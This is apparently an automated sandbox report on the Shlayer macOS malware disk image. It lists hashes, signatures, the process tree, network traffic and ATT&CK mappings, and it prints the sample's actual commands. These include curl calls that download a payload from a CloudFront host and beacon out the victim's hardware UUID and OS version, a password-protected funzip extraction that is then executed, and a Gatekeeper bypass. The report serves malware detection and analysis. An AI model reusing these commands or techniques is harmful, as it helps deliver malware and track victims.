
Analysis Report Shlayer.dmg

Overview

General Information

Sample Name: Shlayer.dmg
Analysis ID: 1440084
MD5: 84d9f983d138141294a8ea6711cbc144
SHA1: 55869270ed20956e5c3e5533fb4472e4eb533dc2
SHA256: 70c6f9da05046525605e2066185929c2659e27a3851dc43d8aa69e2692e6154f

Detection

Shlayer
Score: 72
Range: 0 - 100
Whitelisted: false

Signatures

Script-based application bundle with missing Info.plist (indicative for CVE-2021-30657 bypassing Gatekeeper, File Quarantine and Application Notarization protections)
Yara detected Shlayer
App bundle contains an uncommon file type as the main executable
App bundle contains hidden files/directories
Executes the "funzip" command used for unzipping password protected zips (likely for obfuscating malicious content from detection)
Terminates several processes with shell command 'killall'
Contains symbols with suspicious names likely related to encryption
Contains symbols with suspicious names likely related to networking
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "defaults" command used to read or modify user specific settings
Executes the "mktemp" command used to create a temporary unique file name
Executes the "nohup" (no hangup) command used to keep a background process from being killed when its terminal session ends
Executes the "system_profiler" command used to collect detailed system hardware and software information
Many shell processes execute programs via the execve syscall (might be indicative of malicious behavior)
Queries for attached disk images with shell command 'hdiutil'
Queries the macOS product version
Reads hardware related sysctl values
Reads the sysctl hardware model value (might be used for detecting VM presence)
Reads the systems hostname
Writes 64-bit Mach-O files to disk

Startup

  • System is mac-mojave
  • 1302 (MD5: 22531fba10b6359550cca00ab0be1d2c) Arguments: /Volumes/Installer/yWnBJLaF/1302.app/Contents/MacOS/1302 -psn_0_192559
    • bash New Fork (PID: 966, Parent: 965)
    • mktemp (MD5: 295fb8cee272a251f798cc4b1a713251) Arguments: mktemp -t Installer
    • bash New Fork (PID: 967, Parent: 965)
    • tail (MD5: 8da775e17235dcf5bbd46d1f016aab59) Arguments: tail -c 58853 /Volumes/Installer/yWnBJLaF/1302.app/Contents/MacOS/1302
    • bash New Fork (PID: 968, Parent: 965)
    • funzip (MD5: 87424b028867bea6560cc590720f84d7) Arguments: funzip -1uD9jgw
    • bash New Fork (PID: 969, Parent: 965)
      • bash New Fork (PID: 970, Parent: 969)
      • chmod (MD5: d7df83ea3a49de5d07e0c1730e910852) Arguments: chmod +x /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS
      • bash New Fork (PID: 972, Parent: 969)
      • nohup (MD5: 05e181cb915d336de670a1fcad509435) Arguments: nohup /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS
      • Installer.q2a1KRHS (MD5: 1a06144fdbc2b7f4dab172bb89a36cef) Arguments: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS
        • sh New Fork (PID: 973, Parent: 972)
        • defaults (MD5: 36a61540ce99d6c9303a62405fea340f) Arguments: defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion
        • sh New Fork (PID: 974, Parent: 972)
          • sh New Fork (PID: 975, Parent: 974)
          • system_profiler (MD5: de1aa7b1e123ef5ba1b076a085bbcece) Arguments: system_profiler SPHardwareDataType
          • sh New Fork (PID: 976, Parent: 974)
          • awk (MD5: 434e28a3f230b6e0b1e8ff5637213759) Arguments: awk /UUID/ { print $3 }
        • sh New Fork (PID: 978, Parent: 972)
        • sh New Fork (PID: 979, Parent: 972)
          • sh New Fork (PID: 980, Parent: 979)
          • hdiutil (MD5: 6a08ca12fec7ff0315356432b8cfe31b) Arguments: hdiutil info -plist
          • sh New Fork (PID: 981, Parent: 979)
          • perl (MD5: af70985160b8e3f7b57fde159665e36c) Arguments: perl -0777pe s|<data>\s*(.*?)\s*</data>|<string>$1</string>|gs
          • perl5.18 (MD5: 18ce3464a277a0f79a21935a03f1f9d5) Arguments: perl -0777pe s|<data>\s*(.*?)\s*</data>|<string>$1</string>|gs
          • sh New Fork (PID: 982, Parent: 979)
          • plutil (MD5: 1c2f3fe5fdcbb3b7b386088f70a385c1) Arguments: plutil -convert json -r -o - -- -
        • sh New Fork (PID: 983, Parent: 972)
          • sh New Fork (PID: 984, Parent: 983)
          • curl (MD5: 28fe026db67bee7a3e38a3e32ef21241) Arguments: curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=0&gs=1
        • sh New Fork (PID: 985, Parent: 972)
          • sh New Fork (PID: 986, Parent: 985)
          • curl (MD5: 28fe026db67bee7a3e38a3e32ef21241) Arguments: curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=1&gs=1
        • sh New Fork (PID: 987, Parent: 972)
          • sh New Fork (PID: 988, Parent: 987)
          • curl (MD5: 28fe026db67bee7a3e38a3e32ef21241) Arguments: curl -f0L -o /tmp/DFF83C0E-1D4B-41BD-8272-9BEF24509BE3/D9041C65-22CD-48DA-AA67-637812F92C06 http://d3vav6z7pfe066.cloudfront.net/sd/?c=3mlybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&o=10.14.4&b=12745028138&gs=1
        • sh New Fork (PID: 989, Parent: 972)
          • sh New Fork (PID: 990, Parent: 989)
          • curl (MD5: 28fe026db67bee7a3e38a3e32ef21241) Arguments: curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=3&gs=1
    • bash New Fork (PID: 971, Parent: 965)
    • killall (MD5: ca9725d13691858b17d910f4a50ba04c) Arguments: killall Terminal
  • cleanup

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
1302 | JoeSecurity_Shlayer_2 | Yara detected Shlayer | Joe Security | 

    Signature Overview

    Source: dropped file Installer.q2a1KRHS.297.dr | Mach-O symbol: _CCCrypt
    Source: global traffic | HTTP traffic detected: GET /slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=0&gs=1 HTTP/1.1 | Host: d3vav6z7pfe066.cloudfront.net | User-Agent: curl/7.54.0 | Accept: */*
    Source: global traffic | HTTP traffic detected: GET /slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=1&gs=1 HTTP/1.1 | Host: d3vav6z7pfe066.cloudfront.net | User-Agent: curl/7.54.0 | Accept: */*
    Source: global traffic | HTTP traffic detected: GET /sd/?c=3mlybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&o=10.14.4&b=12745028138&gs=1 HTTP/1.0 | Host: d3vav6z7pfe066.cloudfront.net | User-Agent: curl/7.54.0 | Accept: */*
    Source: global traffic | HTTP traffic detected: GET /slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=3&gs=1 HTTP/1.1 | Host: d3vav6z7pfe066.cloudfront.net | User-Agent: curl/7.54.0 | Accept: */*
    Source: unknown | DNS traffic detected: queries for: d3vav6z7pfe066.cloudfront.net
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1245Connection: closeCache-Control: no-cache, no-storePragma: no-cacheExpires: -1Server: Microsoft-IIS/7.5Access-Control-Allow-Origin: *X-AspNet-Version: 4.0.30319p3p: CP="CAO PSA OUR"Date: Wed, 28 Apr 2021 08:02:06 GMTX-Cache: Error from cloudfrontVia: 1.1 4809763494a078a525dc1a2dff5ddf6c.cloudfront.net (CloudFront)X-Amz-Cf-Pop: FRA53-C1X-Amz-Cf-Id: EKb96V9Hg_WLxo8MSM04zh0ql32i-BswzYDBFD5T233DhhbXqrw05g==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 
6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 6
    Source: 1302, 00000965.00000291.1.000000010e70d000.000000010e717000.r--.sdmp | String found in binary or memory: http://crl.apple.com/codesigning.crl0
    Source: 1302, 00000965.00000291.1.000000010e70d000.000000010e717000.r--.sdmp | String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
    Source: 1302, 00000965.00000291.1.000000010e70d000.000000010e717000.r--.sdmp | String found in binary or memory: http://www.apple.com/appleca/root.crl0
    Source: 1302, 00000965.00000291.1.000000010e70d000.000000010e717000.r--.sdmp | String found in binary or memory: http://www.apple.com/certificateauthority0
    Source: 1302, 00000965.00000291.1.000000010e70d000.000000010e717000.r--.sdmp | String found in binary or memory: https://www.apple.com/appleca/0
    Source: classification engine | Classification label: mal72.troj.evad.macDMG@0/5@1/0
    Source: dropped file Installer.q2a1KRHS.297.dr | Mach-O symbol: __ZTISt12domain_error
    Source: dropped file Installer.q2a1KRHS.297.dr | Mach-O symbol: __ZTVSt12domain_error
    Source: dropped file Installer.q2a1KRHS.297.dr | Mach-O symbol: __ZNSt12domain_errorD1Ev

    Persistence and Installation Behavior:

    Terminates several processes with shell command 'killall'
    Source: /bin/bash (PID: 971) | Killall command executed: killall Terminal
    Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972) | Shell command executed: sh -c defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion
    Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972) | Shell command executed: sh -c system_profiler SPHardwareDataType | awk '/UUID/ { print $3 }'
    Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972) | Shell command executed: sh -c for FILE in /Volumes/Installer/*/*.app do echo '${FILE}' break done
    Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972) | Shell command executed: sh -c hdiutil info -plist | perl -0777pe 's|<data>\s*(.*?)\s*</data>|<string>$1</string>|gs' | plutil -convert json -r -o - -- -
    Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972) | Shell command executed: sh -c curl -L 'http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=0&gs=1' > /dev/null 2>&1
    Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972) | Shell command executed: sh -c curl -L 'http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=1&gs=1' > /dev/null 2>&1
    Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972) | Shell command executed: sh -c curl -f0L -o /tmp/DFF83C0E-1D4B-41BD-8272-9BEF24509BE3/D9041C65-22CD-48DA-AA67-637812F92C06 'http://d3vav6z7pfe066.cloudfront.net/sd/?c=3mlybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&o=10.14.4&b=12745028138&gs=1' > /dev/null 2>&1
    Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972) | Shell command executed: sh -c curl -L 'http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=3&gs=1' > /dev/null 2>&1
    Source: /bin/bash (PID: 970) | Chmod executable: /bin/chmod -> chmod +x /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS
    Source: /bin/sh (PID: 984) | Curl executable: /usr/bin/curl -> curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=0&gs=1
    Source: /bin/sh (PID: 986) | Curl executable: /usr/bin/curl -> curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=1&gs=1
    Source: /bin/sh (PID: 988) | Curl executable: /usr/bin/curl -> curl -f0L -o /tmp/DFF83C0E-1D4B-41BD-8272-9BEF24509BE3/D9041C65-22CD-48DA-AA67-637812F92C06 http://d3vav6z7pfe066.cloudfront.net/sd/?c=3mlybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&o=10.14.4&b=12745028138&gs=1
    Source: /bin/sh (PID: 990) | Curl executable: /usr/bin/curl -> curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=3&gs=1
    Source: /bin/bash (PID: 966) | Mktemp executable: /usr/bin/mktemp -> mktemp -t Installer
    Source: /bin/bash (PID: 972) | Nohup executable: /usr/bin/nohup -> nohup /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS
    Source: /bin/sh (PID: 973) | Shell process: defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion
    Source: /bin/sh (PID: 975) | Shell process: system_profiler SPHardwareDataType
    Source: /bin/sh (PID: 976) | Shell process: awk /UUID/ { print $3 }
    Source: /bin/sh (PID: 980) | Shell process: hdiutil info -plist
    Source: /bin/sh (PID: 981) | Shell process: perl -0777pe s|<data>\s*(.*?)\s*</data>|<string>$1</string>|gs
    Source: /bin/sh (PID: 982) | Shell process: plutil -convert json -r -o - -- -
    Source: /bin/sh (PID: 984) | Shell process: curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=0&gs=1
    Source: /bin/sh (PID: 986) | Shell process: curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=1&gs=1
    Source: /bin/sh (PID: 988) | Shell process: curl -f0L -o /tmp/DFF83C0E-1D4B-41BD-8272-9BEF24509BE3/D9041C65-22CD-48DA-AA67-637812F92C06 http://d3vav6z7pfe066.cloudfront.net/sd/?c=3mlybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&o=10.14.4&b=12745028138&gs=1
    Source: /bin/sh (PID: 990) | Shell process: curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=3&gs=1
    Source: /bin/sh (PID: 980) | Hdiutil command executed: hdiutil info -plist
    Source: /usr/bin/funzip (PID: 968) | File written: /private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS
    Source: /bin/sh (PID: 976) | Awk executable: /usr/bin/awk -> awk /UUID/ { print $3 }
    Source: /usr/bin/perl5.18 (PID: 981) | Random device file read: /dev/urandom

    Hooking and other Techniques for Hiding and Protection:

    App bundle contains an uncommon file type as the main executable
    Source: archive file from DMG submission | Uncommon file type "Bourne-Again shell script text executable": Installer/yWnBJLaF/1302.app/Contents/MacOS/1302
    App bundle contains hidden files/directories
    Source: archive file from DMG submission | Hidden file: Installer/.nFO7evVxM9sjuU.png
    Executes the "funzip" command used for unzipping password protected zips (likely for obfuscating malicious content from detection)
    Source: /bin/bash (PID: 968) | Funzip executable: /usr/bin/funzip -> funzip -1uD9jgw
    Source: /usr/sbin/system_profiler (PID: 977) | Sysctl read request: hw.model (6.2)
    Source: Installer.q2a1KRHS, 00000972.00000305.9.0000000102075000.000000010207b000.r--.sdmp | Binary or memory string: framework.vmnet
    Source: Installer.q2a1KRHS, 00000972.00000305.9.0000000102075000.000000010207b000.r--.sdmp | Binary or memory string: framework.vmnet$

    HIPS / PFW / Operating System Protection Evasion:

    Script-based application bundle with missing Info.plist (indicative for CVE-2021-30657 bypassing Gatekeeper, File Quarantine and Application Notarization protections)
    Source: submission archive DMG | Script file without a corresponding application bundle Info.plist: Installer/yWnBJLaF/1302.app/Contents/MacOS/1302
    Source: /bin/sh (PID: 973) | Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion
    Source: /usr/sbin/system_profiler (PID: 977) | Sysctl read request: hw.cpu_freq (6.15)
    Source: /usr/sbin/system_profiler (PID: 977) | Sysctl read request: hw.memsize (6.24)
    Source: /Volumes/Installer/yWnBJLaF/1302.app/Contents/MacOS/1302 (PID: 965) | Sysctl requested: kern.hostname (1.10)
    Source: /bin/sh (PID: 973) | Sysctl requested: kern.hostname (1.10)
    Source: /bin/sh (PID: 974) | Sysctl requested: kern.hostname (1.10)
    Source: /bin/sh (PID: 978) | Sysctl requested: kern.hostname (1.10)
    Source: /bin/sh (PID: 979) | Sysctl requested: kern.hostname (1.10)
    Source: /bin/sh (PID: 983) | Sysctl requested: kern.hostname (1.10)
    Source: /bin/sh (PID: 985) | Sysctl requested: kern.hostname (1.10)
    Source: /bin/sh (PID: 987) | Sysctl requested: kern.hostname (1.10)
    Source: /bin/sh (PID: 989) | Sysctl requested: kern.hostname (1.10)
    Source: /bin/sh (PID: 973) | Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion

    Stealing of Sensitive Information:

    Yara detected Shlayer
    Source: Yara match | File source: 1302, type: SAMPLE
    Source: /bin/sh (PID: 975) | System_profiler executable: /usr/sbin/system_profiler system_profiler SPHardwareDataType
    Source: /usr/sbin/system_profiler (PID: 975) | System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full

    Remote Access Functionality:

    Yara detected Shlayer
    Source: Yara match | File source: 1302, type: SAMPLE

    Mitre Att&ck Matrix

    The matrix is listed per tactic column; numbers in parentheses are the count badges attached to technique names in the original matrix.

    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
    Execution: Command and Scripting Interpreter (11); Scripting (1); At (Linux); At (Windows); Cron; Launchd; Scheduled Task
    Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
    Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
    Defense Evasion: Masquerading (2); Hide Artifacts (1); Virtualization/Sandbox Evasion (1); File and Directory Permissions Modification (1); Scripting (1); Hidden Files and Directories (2); Gatekeeper Bypass (1)
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
    Discovery: Security Software Discovery (11); Virtualization/Sandbox Evasion (1); System Information Discovery (6); System Network Configuration Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
    Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
    Exfiltration: Data Encrypted (1); Exfiltration Over Alternative Protocol (1); Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
    Command and Control: Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (3); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
    Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
    Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
    Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

    Behavior Graph

    [Graph image not available in text form. Recoverable node data: Behavior Graph ID: 1440084; Sample: Shlayer.dmg; Start date: 28/04/2021; Architecture: MAC; Score: 72. Network node: d3vav6z7pfe066.cloudfront.net, 143.204.214.77, ports 49466, 49467, 49468, AMAZON-02, US, United States. Dropped file node: /private/var/folde.../Installer.q2a1KRHS, Mach-O. Root process: xpcproxy 1302, with the bash, funzip, killall, nohup, chmod, sh, perl, perl5.18, hdiutil, plutil, system_profiler, awk and curl child processes listed in the Startup section. Signature nodes attached: Script-based application bundle with missing Info.plist (CVE-2021-30657); Yara detected Shlayer; App bundle contains an uncommon file type as the main executable; App bundle contains hidden files/directories; Executes the "funzip" command; Terminates several processes with shell command 'killall'.]
